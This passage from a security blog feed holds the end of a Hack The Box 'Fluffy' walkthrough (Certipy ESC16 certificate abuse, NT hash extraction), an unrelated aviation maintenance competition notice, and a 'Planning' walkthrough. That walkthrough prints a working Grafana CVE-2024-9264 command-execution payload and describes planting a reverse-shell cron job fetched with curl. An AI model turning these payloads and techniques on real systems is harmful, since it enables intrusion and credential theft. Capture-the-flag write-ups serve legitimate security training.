We can access the machine using the winrm_svc account by leveraging its NT hash.
We can read the user flag by executing the command type user.txt.
Privilege Escalation:
This command leverages Certipy in combination with ntpdate to adjust the system time, targeting the user ca_svc with the specified NT hash against the domain fluffy.htb. The -stdout option directs the output to the console, and the -vulnerable flag identifies potentially exploitable accounts or services. This method facilitates pass-the-hash or Kerberos-related enumeration while accounting for time-based restrictions in the environment.
The Certificate Authority (CA) DC01.fluffy.htb is vulnerable to ESC16, a misconfiguration that allows abusing certificate templates for privilege escalation. While the WINRM_SVC account lacks elevated privileges, its CA access provides a path to target higher-privileged accounts, such as the administrator.
Vulnerabilities
ESC16: The disabled Security Extension leaves the system susceptible to abuse.
Remarks
ESC16 may require additional prerequisites. Refer to the official wiki for guidance.
We executed the Certipy account command to update the ca_svc account on the fluffy.htb domain. Using the credentials of p.agila@fluffy.htb (prometheusx-303) and targeting the domain controller at 10.10.11.69, we modified the accountβs userPrincipalName to administrator. This modification allows the account to perform actions with elevated privileges, enabling further privilege escalation within the environment.
Using Certipyβs shadow command, we performed automated Kerberos-based credential extraction for the ca_svc account on fluffy.htb. Authenticated as p.agila@fluffy.htb (prometheusx-303) and targeting 10.10.11.69, Certipy generated a certificate and key credential, temporarily added it to ca_svcβs Key Credentials, and authenticated as ca_svc. It obtained a TGT, saved the cache to ca_svc.ccache, and retrieved the NT hash (ca0f4f9e9eb8a092addf53bb03fc98c8). Certipy then restored ca_svcβs original Key Credentials. Finally, we set KRB5CCNAME=ca_svc.ccache to enable subsequent Kerberos operations with the extracted credentials.
Using Certipy, we issued a certificate request with the req command, targeting the domain controller DC01.FLUFFY.HTB and the Certificate Authority fluffy-DC01-CA, while specifying the User template. Although we did not explicitly provide the DC host, Kerberos authentication handled the request over RPC. The Certificate Authority successfully processed the request (Request ID 15) and issued a certificate for the administrator user principal. The certificate did not include an object SID, with a note suggesting the -sid option if needed. We saved the certificate and its private key to administrator.pfx, completing the process.
The command uses Certipy to update the ca_svc account on the domain fluffy.htb. Authenticated as p.agila@fluffy.htb with the password prometheusx-303 and targeting the domain controller at 10.10.11.69, the accountβs userPrincipalName is set to ca_svc@fluffy.htb. Certipy confirms that the update was successful, ensuring the ca_svc account reflects the correct user principal name for subsequent operations.
Using Certipy, the auth command was executed to authenticate as the administrator user on the domain fluffy.htb using the certificate stored in administrator.pfx. The tool identified the certificateβs SAN UPN as administrator and used it to request a Ticket Granting Ticket (TGT) from the domain controller at 10.10.11.69. The TGT was successfully obtained and saved to the credential cache file administrator.ccache. Certipy then retrieved the NT hash for administrator@fluffy.htb, which can be used for subsequent authentication or privilege escalation activities.
We accessed the target machine via WinRM using either the authenticated credentials or the extracted NT hash, which enabled remote command execution on the system.
We can read the root flag by executing the command type root.txt.
The post Hack The Box: Fluffy Machine Walkthrough β Easy Difficulity appeared first on Threatninja.net.
The commercial aviation industry is a crucial component of the U.S. economy, playing a vital role in transporting people, intermediate/final goods, and driving demand for various goods and services nationwide. This network enhances the quality of life for the whole country and facilitates business interactions within and globally, boosting productivity and prosperity. However, the industry faces numerous challenges, particularly the need to reduce rising operational costs in a growing market to accommodate increased demand in air travel, e-commerce, and cargo sectors. Issues such as aging aircraft and components, technological advancements, and staffing shortages further complicate these challenges, hindering efforts to balance passenger safety with operational efficiency. To address these challenges, the industry needs to swiftly innovate and implement more efficient and resilient aircraft maintenance practices, including the adoption of new technologies. In the 2026 Gateways to Blue Skies Competition, teams will conceptualizeΒ novel aviation maintenance advancements that can be implemented by 2035 or sooner with the goal of improving efficiency, safety, and/or costs for the industry. Teams are encouraged to consider high-potential technologies and systems that arenβt currently mainstream or highly regarded as becoming mainstream in the future, imagining beyond the status quo.
Award: $72,000 in total prizes
Open Date: Phase 1 β September 18, 2025; Phase 2 β March 13, 2026
Close Date: Phase 1 β February 16, 2026; Phase 2- May 15, 2026
For more information, visit: https://blueskies.nianet.org/competition/
In this write-up, we will explore the βPlanningβ machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βPlanningβ machine from Hack The Box by achieving the following objectives:
User Flag:
During reconnaissance, extensive fuzzing was required to identify a Grafana instance vulnerable to CVE-2024-9264βa critical flaw enabling arbitrary command execution through unsanitized SQL inputs in the DuckDB CLI. By deploying a proof-of-concept exploit, I successfully extracted files and ran commands, gaining entry to the Grafana container but not the underlying host. Subsequent enumeration uncovered valid credentials for the user βenzo,β which granted SSH access to the host system.
Root Flag:
Once on the host, I discovered the Crontab-UI serviceβa web-based tool for managing cron jobsβrunning on localhost:8000 and secured with Basic Authentication. Leveraging the earlier credentials for the βenzoβ user, I authenticated to the interface and added a malicious cron job configured to establish a reverse shell connection.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.68Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/planning]
ββββΌ $nmap -sC -sV -oA initial 10.10.11.68
# Nmap 7.94SVN scan initiated Wed Sep 10 08:09:24 2025 as: nmap -sC -sV -oA initial 10.10.11.68
Nmap scan report for 10.10.11.68
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_ 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 08:09:35 2025 -- 1 IP address (1 host up) scanned in 11.35 seconds
ββ[dark@parrot]β[~/Documents/htb/planning]
ββββΌ $Analysis:
The website for Edukate appears to be a standard educational platform.
Edukate is a free educational website template designed for online learning platforms and academic institutions. Its intuitive layout improves user engagement, while its clean, developer-friendly codebase makes customization simple. Built with Sass for easy maintenance, Edukate is optimized for page speed to deliver fast loading times and lower bounce rates. It is fully cross-browser compatible, ensuring a smooth experience across all major browsers, and SEO-friendly to help boost search engine rankings.
Source: themewagon/Edukate
No usable elements are present here.
Nothing noteworthy here either.
Perform web enumeration to discover potentially exploitable directories and files.
gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50Gobuster Output:
ββ[dark@parrot]β[/opt/SecLists/Discovery/DNS]
ββββΌ $gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://planning.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: combined_subdomains.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================
ββ[dark@parrot]β[/opt/SecLists/Discovery/DNS]
ββββΌ $
Analysis:
Discovery: grafana.planning.htb
grafana.planning.htb.grafana, it strongly suggests it is a Grafana dashboard instance.
The grafana.planning.htb subdomain loads successfully and displays the Grafana login page.
We should be able to log in using the credentials provided by Hack The Box.
We need to inspect the traffic using Burp Suite.
First, I noticed that the endpoint /api/user/auth-tokens-rotate is available here.
We successfully gained access to the Grafana dashboard.
We also confirmed that the Grafana instance is running version 11.0.0
There are numerous tokens being rotated here.
This is what the response looks like in Burp Suite.
This vulnerability targets Grafana 11βs experimental SQL Expressions feature, which allows users to post-process query results via custom SQL using DuckDB. The flaw arises because user input isnβt properly sanitized before being sent to the DuckDB CLI, enabling remote code execution (RCE) or arbitrary file reads. The root cause is unfiltered input passed directly to the DuckDB command-line interface. The CVSS v3.1 score is 9.9 (Critical).
Grafana doesnβt include DuckDB by default. For exploitation, DuckDB must be installed on the server and accessible in Grafanaβs PATH. If itβs absent, the system is safe.
Using a PoC, we can exploit this flaw to read system files, demonstrating its impact and severity.
Letβs search Google for potential exploits targeting Grafana v11.0.0
This flaw enables authenticated users to attain remote code execution (RCE). I exploited it using the publicly available proof-of-concept from Nolliumβs GitHub repository.
We successfully retrieved the /etc/passwd file.
When we ran the whoami command, it returned root, which is unexpected.
Letβs set up our listener.
Unfortunately, we were unable to execute the command due to an error.
As suspected, this is running inside a Docker container.
The environment variables reveal the Grafana admin credentials:
GF_SECURITY_ADMIN_USER=enzoGF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!.
The api/ds/query endpoint is available in Grafana, and we can leverage it for this exploit.
If the full path is not specified, it responds with a βNot Foundβ message.
However, attempting to execute the full path results in an βUnauthorizedβ response.
Itβs still the same; we need to send the JSON data here.
After replacing the token, it worked.
{
"from": "1729313027261",
"queries": [
{
"datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
"expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv(\"whoami > /tmp/output.txt 2>&1 |")",
"hide": false,
"refId": "B",
"type": "sql",
"window": ""
}
],
"to": "1729334627261"
}This JSON payload is a crafted query sent to Grafanaβs api/ds/query endpoint. It uses the Expression data source with an SQL expression to run a sequence of commands: first installing and loading the shellfs extension, then executing whoami and redirecting the output to /tmp/output.txt. This effectively demonstrates command execution through CVE-2024-9264.
Reading the contents of /tmp/output.txt confirms that the whoami command executed on the target machine.
Letβs set up our listener to catch the reverse shell.
Use this SQL command to execute the bash script.
Itβs hanging, which is a good sign that the payload is executing.
We successfully received a reverse shell connection.
We attempted to switch to the enzo user with su enzo, but it didnβt work.
SSH worked perfectly and allowed us to log in successfully.
We were able to read the user flag by running cat user.txt.
Privilege Escalation:
Locate the database file.
We discovered /opt/crrontabs/crontab.db.
The password for root_grafana is P4ssw0rdS0pRi0T3c.
Port 8000 is open here, which is unusual.
Letβs set up port forwarding for port 8000.
We need to provide the credentials to log in.
We need to use the credentials we discovered earlier to log in.
It turned out to be a cron jobs management interface.
Crontab-UI is an open-source Node.js web interface for managing cron jobs on Unix-like systems, simplifying tasks like creating, editing, pausing, deleting, and backing up crontab entries via a browser (default: http://localhost:8000). It reduces errors from manual text editing, supports error logging, email notifications, webhooks, and easy import/export for multi-machine deployment. Installation is via npm (npm install crontab-ui -g), with optional Docker support and Basic Auth for security. Ideal for beginners handling scheduled tasks.
We need to create a new cron job command.
The shell.sh file contains the reverse shell that will connect back to us.
We will use curl to fetch the file, as demonstrated earlier.
The file was transferred successfully, as expected.
We were able to access the root shell and read the root flag by running cat root.txt.
The post Hack The Box: Planning Machine Walkthrouh β Easy Diffucilty appeared first on Threatninja.net.
